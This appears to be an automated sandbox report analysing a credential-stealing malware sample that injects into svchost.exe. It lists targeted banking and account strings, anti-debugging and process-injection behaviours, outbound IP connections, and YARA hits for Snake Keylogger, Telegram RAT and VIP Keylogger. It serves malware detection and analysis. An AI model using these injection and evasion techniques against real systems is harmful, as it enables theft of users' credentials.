Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: svchost.exe, 00000003.00000002.4473198929.00000000052F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcad0e9d9f0038<
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: svchost.exe, 00000006.00000002.4471702197.000000000346D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Windows\SysWOW64\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_080A9578 LdrInitializeThunk, 3_2_080A9578
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C6EAA2 BlockInput, 0_2_00C6EAA2
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C22622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00C22622
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 3_2_004019F0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00BF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BF42DE
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C14CE8 mov eax, dword ptr fs:[00000030h] 0_2_00C14CE8
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00B634E0 mov eax, dword ptr fs:[00000030h] 0_2_00B634E0
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00B63540 mov eax, dword ptr fs:[00000030h] 0_2_00B63540
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00B61EB0 mov eax, dword ptr fs:[00000030h] 0_2_00B61EB0
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E84CE8 mov eax, dword ptr fs:[00000030h] 2_2_00E84CE8
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_035C3540 mov eax, dword ptr fs:[00000030h] 2_2_035C3540
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_035C34E0 mov eax, dword ptr fs:[00000030h] 2_2_035C34E0
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_035C1EB0 mov eax, dword ptr fs:[00000030h] 2_2_035C1EB0
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 5_2_013D1EB0 mov eax, dword ptr fs:[00000030h] 5_2_013D1EB0
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 5_2_013D34E0 mov eax, dword ptr fs:[00000030h] 5_2_013D34E0
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 5_2_013D3540 mov eax, dword ptr fs:[00000030h] 5_2_013D3540
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C50B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00C50B62
Enables debug privileges
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C22622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00C22622
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C1083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00C1083F
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C109D5 SetUnhandledExceptionFilter, 0_2_00C109D5
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C10C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00C10C21
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E92622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00E92622
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E8083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00E8083F
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E809D5 SetUnhandledExceptionFilter, 2_2_00E809D5
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E80C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00E80C21
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0040CE09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0040E61C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00416F6A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_004123F1 SetUnhandledExceptionFilter, 3_2_004123F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_0040CE09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_0040E61C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00416F6A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_004123F1 SetUnhandledExceptionFilter, 6_2_004123F1
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 118.69.190.131 587 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 158.101.44.242 80 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 149.154.167.220 443 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 188.114.97.3 443 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2CD7008 Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2F93008 Jump to behavior
Contains functionality to execute programs as a different user
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C51201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00C51201
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C32BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00C32BA5
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C5B226 SendInput,keybd_event, 0_2_00C5B226
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C722DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 0_2_00C722DA
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DSD876543456780000.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe" Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C50B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00C50B62
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C51663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00C51663
Source: DSD876543456780000.exe, chordates.exe.0.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: DSD876543456780000.exe, chordates.exe Binary or memory string: Shell_TrayWnd
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C10698 cpuid 0_2_00C10698
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoA, 3_2_00417A20
Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoA, 6_2_00417A20
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: unknown VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: unknown VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C68195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW, 0_2_00C68195
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C4D27A GetUserNameW, 0_2_00C4D27A
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C2B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 0_2_00C2B952
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00BF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BF42DE
Source: C:\Users\user\Desktop\DSD876543456780000.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: svchost.exe PID: 5260, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 6024, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
